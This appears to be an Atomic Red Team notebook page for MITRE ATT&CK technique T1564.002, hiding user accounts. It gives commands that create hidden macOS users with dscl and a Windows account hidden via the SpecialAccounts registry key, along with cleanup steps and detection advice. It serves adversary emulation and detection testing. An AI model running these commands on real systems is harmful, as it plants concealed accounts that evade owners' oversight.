# T1564.002 - Hidden Users
Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. 

In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value <code>Hide500Users</code> to <code>TRUE</code> in the <code>/Library/Preferences/com.apple.loginwindow</code> plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the <code>Hide500Users</code> key value is set to <code>TRUE</code>, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the <code>dscl</code> utility to create hidden user accounts by setting the <code>IsHidden</code> attribute to <code>1</code>. Adversaries can also hide a user’s home folder by changing the <code>chflags</code> to hidden.(Citation: Apple Support Hide a User Account) 

Adversaries may similarly hide user accounts in Windows. Adversaries can set the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList</code> Registry key value to <code>0</code> for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)

On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the <code>gsettings</code> command (ex: <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.

## Atomic Tests

### Atomic Test #1 - Create Hidden User using UniqueID < 500Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default)
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo dscl . -create /Users/APT UniqueID 333
```

In [ ]:
Invoke-AtomicTest T1564.002 -TestNumbers 1

#### Cleanup: 
```sh
sudo dscl . -delete /Users/APT
```

In [ ]:
Invoke-AtomicTest T1564.002 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Create Hidden User using IsHidden optionAdd a hidden user on macOS using IsHidden optoin
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo dscl . -create /Users/APT IsHidden 1
```

In [ ]:
Invoke-AtomicTest T1564.002 -TestNumbers 2

#### Cleanup: 
```sh
sudo dscl . -delete /Users/APT
```

In [ ]:
Invoke-AtomicTest T1564.002 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Create Hidden User in RegistryAdversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.
Reference https://attack.mitre.org/techniques/T1564/002/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
NET USER AtomicOperator$ At0micRedTeam! /ADD /expires:never 
REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v AtomicOperator$ /t REG_DWORD /d 0
```

In [ ]:
Invoke-AtomicTest T1564.002 -TestNumbers 3

#### Cleanup: 
```cmd
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v AtomicOperator$ /f >nul 2>&1
net user ${user_name}$ /delete >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1564.002 -TestNumbers 3 -Cleanup

## Detection
Monitor for users that may be hidden from the login screen but still present in additional artifacts of usage such as directories and authentication logs. 

Monitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList</code> key.

In macOS, monitor for commands, processes, and file activity in combination with a user that has a userID under 500.(Citation: Cybereason OSX Pirrit) Monitor for modifications to set the <code>Hide500Users</code> key value to <code>TRUE</code> in the <code>/Library/Preferences/com.apple.loginwindow</code> plist file. Monitor the command line for usage of the <code>dscl . create</code> command with the <code>IsHidden</code> attribute set to <code>1</code>.(Citation: Apple Support Hide a User Account) 